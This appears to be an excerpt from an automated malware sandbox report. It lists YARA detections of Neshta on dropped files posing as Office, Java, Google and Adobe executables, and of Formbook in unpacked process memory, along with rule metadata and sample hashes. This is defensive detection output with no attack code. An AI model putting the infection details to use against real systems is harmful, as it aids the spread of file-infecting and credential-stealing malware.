          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Windows\svchost.com, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\Source user\OSE.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Adobe\ARM\S\11357\AdobeARMHelper.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: 7.2.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: 7.1.elxhan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.1.elxhan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.elxhan.exe.22b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.elxhan.exe.22b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.1.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.1.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.vi0EwpbUht.exe.30e0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.vi0EwpbUht.exe.30e0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.svchost.com.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: 6.2.elxhan.exe.22b0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
